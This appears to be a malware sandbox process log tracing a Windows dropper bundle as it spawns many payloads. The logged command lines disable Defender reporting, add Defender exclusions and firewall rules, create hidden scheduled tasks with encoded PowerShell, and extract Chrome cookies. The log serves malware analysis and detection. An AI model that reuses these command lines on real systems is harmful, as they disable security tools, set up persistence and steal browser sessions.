                      cmd: /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
                    - PID 4736: \??\c:\windows\SysWOW64\reg.exe
                        cmd: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
                    - PID 2860: \??\c:\windows\SysWOW64\reg.exe
                        cmd: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
                - PID 5628: C:\Windows\SysWOW64\schtasks.exe
                    cmd: schtasks /CREATE /TN "gWQSZAlZZ" /SC once /ST 00:11:00 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                    sigs: Creates scheduled task(s)
                - PID 4448: C:\Windows\SysWOW64\schtasks.exe
                    cmd: schtasks /run /I /tn "gWQSZAlZZ"
                - PID 4744: C:\Windows\SysWOW64\schtasks.exe
                    cmd: schtasks /DELETE /F /TN "gWQSZAlZZ"
                - PID 5832: C:\Windows\SysWOW64\schtasks.exe
                    cmd: schtasks /CREATE /TN "brIuwqybiEKAwdpiwj" /SC once /ST 00:14:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\WUUWFJqnKFeOpXCaR\eeNammEZxjaGeaJ\twLMTLb.exe\" AP /site_id 525403 /S" /V1 /F
                    sigs: Creates scheduled task(s)
C:\Users\Admin\Pictures\Adobe Films\r9DMnfO48zyarr1eSE05LKzv.exe"C:\Users\Admin\Pictures\Adobe Films\r9DMnfO48zyarr1eSE05LKzv.exe"6⤵PID:5224
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt7⤵PID:3720
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /stab C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt7⤵PID:1972
-
-
-
C:\Users\Admin\Pictures\Adobe Films\D2Qp411Ip8Z8_YULGOLDIuxE.exe"C:\Users\Admin\Pictures\Adobe Films\D2Qp411Ip8Z8_YULGOLDIuxE.exe"6⤵PID:5248
-
C:\Users\Admin\AppData\Local\Temp\famX9DdWO4X74\EasyCalc License Agreement.exe"C:\Users\Admin\AppData\Local\Temp\famX9DdWO4X74\EasyCalc License Agreement.exe"7⤵PID:5528
-
-
-
C:\Users\Admin\Pictures\Adobe Films\oiMnaMCq7Lm7jKcpXTWF7BNM.exe"C:\Users\Admin\Pictures\Adobe Films\oiMnaMCq7Lm7jKcpXTWF7BNM.exe"6⤵PID:5392
-
-
C:\Users\Admin\Pictures\Adobe Films\tbORYp8muUpVGEdITgK3MR5G.exe"C:\Users\Admin\Pictures\Adobe Films\tbORYp8muUpVGEdITgK3MR5G.exe"6⤵PID:5428
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5428 -s 4007⤵
- Program crash
PID:5908
-
-
-
C:\Users\Admin\Pictures\Adobe Films\xagH64Ef3y2u2ETT27IWnKJR.exe"C:\Users\Admin\Pictures\Adobe Films\xagH64Ef3y2u2ETT27IWnKJR.exe"6⤵PID:5480
-
C:\Users\Admin\Pictures\Adobe Films\xagH64Ef3y2u2ETT27IWnKJR.exe"C:\Users\Admin\Pictures\Adobe Films\xagH64Ef3y2u2ETT27IWnKJR.exe"7⤵PID:6108
-
-
-
C:\Users\Admin\Pictures\Adobe Films\2x2ks0IMQgbM_mfoS1XyMUyX.exe"C:\Users\Admin\Pictures\Adobe Films\2x2ks0IMQgbM_mfoS1XyMUyX.exe"6⤵PID:5456
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5456 -s 4007⤵
- Program crash
PID:5916
-
-
-
C:\Users\Admin\Pictures\Adobe Films\pByBOI1Ghz2wjskbQr3OjHjA.exe"C:\Users\Admin\Pictures\Adobe Films\pByBOI1Ghz2wjskbQr3OjHjA.exe"6⤵PID:5540
-
-
C:\Users\Admin\Pictures\Adobe Films\vSZDGJfcSXqtsZ10Kd1r8z8e.exe"C:\Users\Admin\Pictures\Adobe Films\vSZDGJfcSXqtsZ10Kd1r8z8e.exe"6⤵PID:5644
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\7⤵PID:3412
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath \\?\C:\Windows \7⤵PID:5336
-
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes7⤵PID:5944
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /create /sc minute /ED "11/02/2024" /mo 7 /tn "Timer" /tr c:\windows\system\svchost.exe /ru SYSTEM7⤵
- Creates scheduled task(s)
PID:4248
-
-
C:\Windows\System\svchost.exe"C:\Windows\System\svchost.exe" formal7⤵PID:2600
-
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes7⤵PID:4664
-
-
-
C:\Users\Admin\Pictures\Adobe Films\nPgwknobT1e80SNU9uwUZkW3.exe"C:\Users\Admin\Pictures\Adobe Films\nPgwknobT1e80SNU9uwUZkW3.exe"6⤵PID:5580
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri0550507893048c.exe4⤵PID:1608
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri05c25ad4f6fe4.exe4⤵PID:1244
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri05cac54300eb.exe4⤵PID:2492
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri059521701074cbcde.exe4⤵PID:2480
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri0519054cecb36fc1b.exe4⤵PID:1604
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri058313bd59e.exe4⤵PID:3260
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zS8EE8A195\Fri058313bd59e.exe"C:\Users\Admin\AppData\Local\Temp\7zS8EE8A195\Fri058313bd59e.exe" -u1⤵PID:5060
-
C:\Windows\SysWOW64\control.exe"C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\KGG6K.cpL",1⤵PID:2896
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\KGG6K.cpL",2⤵PID:2324
C:\Windows\system32\RunDll32.exeC:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\KGG6K.cpL",3⤵PID:2260
C:\Users\Admin\AppData\Local\Temp\7zS8EE8A195\Fri05e80376d7965136.exe"C:\Users\Admin\AppData\Local\Temp\7zS8EE8A195\Fri05e80376d7965136.exe" /SILENT1⤵PID:1184
C:\Users\Admin\AppData\Local\Temp\is-ONRNR.tmp\Fri05e80376d7965136.tmp"C:\Users\Admin\AppData\Local\Temp\is-ONRNR.tmp\Fri05e80376d7965136.tmp" /SL5="$20202,870426,780800,C:\Users\Admin\AppData\Local\Temp\7zS8EE8A195\Fri05e80376d7965136.exe" /SILENT2⤵PID:1800
C:\Users\Admin\AppData\Local\Temp\is-OKQDM.tmp\windllhost.exe"C:\Users\Admin\AppData\Local\Temp\is-OKQDM.tmp\windllhost.exe" 773⤵PID:2504
C:\Users\Admin\AppData\Local\Temp\7zS8EE8A195\Fri05c25ad4f6fe4.exeC:\Users\Admin\AppData\Local\Temp\7zS8EE8A195\Fri05c25ad4f6fe4.exe1⤵PID:2292
C:\Users\Admin\AppData\Local\Temp\7zS8EE8A195\Fri0573351d0136.exeC:\Users\Admin\AppData\Local\Temp\7zS8EE8A195\Fri0573351d0136.exe1⤵PID:1872
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"1⤵PID:3388
C:\Users\Admin\AppData\Local\Temp\mystnnewfile.exe"C:\Users\Admin\AppData\Local\Temp\mystnnewfile.exe"2⤵PID:1628
C:\Users\Admin\AppData\Local\Temp\inst.exe"C:\Users\Admin\AppData\Local\Temp\inst.exe"2⤵PID:4328
C:\Users\Admin\AppData\Local\Temp\compan.exe"C:\Users\Admin\AppData\Local\Temp\compan.exe"2⤵PID:4828
C:\Users\Admin\AppData\Local\Temp\Skype.exeC:\Users\Admin\AppData\Local\Temp\Skype.exe3⤵PID:3916
C:\Users\Admin\AppData\Local\Temp\RobCleanerInstll31828.exe"C:\Users\Admin\AppData\Local\Temp\RobCleanerInstll31828.exe"2⤵PID:4288
C:\Users\Admin\AppData\Local\7c5832ae-0a76-4fe3-94c7-2764cb0ce5b5.exe"C:\Users\Admin\AppData\Local\7c5832ae-0a76-4fe3-94c7-2764cb0ce5b5.exe"3⤵
- Executes dropped EXE
PID:2484
C:\Users\Admin\AppData\Local\b833b94a-993e-4b3b-8471-d11c0968483b.exe"C:\Users\Admin\AppData\Local\b833b94a-993e-4b3b-8471-d11c0968483b.exe"3⤵PID:4212
C:\Users\Admin\AppData\Local\ce25f743-2ca1-47b7-b499-837a5deaaeab.exe"C:\Users\Admin\AppData\Local\ce25f743-2ca1-47b7-b499-837a5deaaeab.exe"3⤵PID:2680
C:\Users\Admin\AppData\Local\b00766f6-af54-4d3d-b337-cadc85817024.exe"C:\Users\Admin\AppData\Local\b00766f6-af54-4d3d-b337-cadc85817024.exe"3⤵PID:3588
C:\Users\Admin\AppData\Roaming\5718271.exe"C:\Users\Admin\AppData\Roaming\5718271.exe"4⤵PID:4384
C:\Windows\SysWOW64\control.exe"C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\EdRGQQA5.cPl",5⤵PID:1964
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\EdRGQQA5.cPl",6⤵PID:3336
C:\Windows\system32\RunDll32.exeC:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\EdRGQQA5.cPl",7⤵PID:2364
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\Admin\AppData\Local\Temp\EdRGQQA5.cPl",8⤵PID:5204
C:\Users\Admin\AppData\Local\3b8f80a4-e9d1-4f29-99cb-d45b6424556b.exe"C:\Users\Admin\AppData\Local\3b8f80a4-e9d1-4f29-99cb-d45b6424556b.exe"3⤵PID:2896
C:\Users\Admin\AppData\Local\Temp\7zS8EE8A195\Fri059521701074cbcde.exeFri059521701074cbcde.exe1⤵
- Executes dropped EXE
PID:3860
C:\Users\Admin\AppData\Local\Temp\7zS8EE8A195\Fri05cac54300eb.exeFri05cac54300eb.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3968
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe2⤵PID:5116
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe3⤵
- Kills process with taskkill
PID:1228
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt1⤵PID:2180
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "Fri0510f5b933f.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zS8EE8A195\Fri0510f5b933f.exe" & exit1⤵PID:5040
C:\Windows\SysWOW64\taskkill.exetaskkill /im "Fri0510f5b933f.exe" /f2⤵
- Kills process with taskkill
PID:1404
C:\Users\Admin\AppData\Local\Temp\7zS8EE8A195\Fri0510f5b933f.exeFri0510f5b933f.exe /mixtwo1⤵
- Executes dropped EXE
PID:2660
C:\Users\Admin\AppData\Local\Temp\7zS8EE8A195\Fri0550507893048c.exeFri0550507893048c.exe1⤵
- Executes dropped EXE
PID:2648
C:\Users\Admin\AppData\Local\Temp\7zS8EE8A195\Fri058313bd59e.exeFri058313bd59e.exe1⤵PID:2484
C:\Users\Admin\AppData\Local\Temp\7zS8EE8A195\Fri0519054cecb36fc1b.exeFri0519054cecb36fc1b.exe1⤵
- Executes dropped EXE
PID:2468
C:\Users\Admin\AppData\Local\Temp\7zS8EE8A195\Fri05c25ad4f6fe4.exeFri05c25ad4f6fe4.exe1⤵
- Executes dropped EXE
PID:1440
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:3960
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:2116
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService1⤵PID:4272
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵PID:5136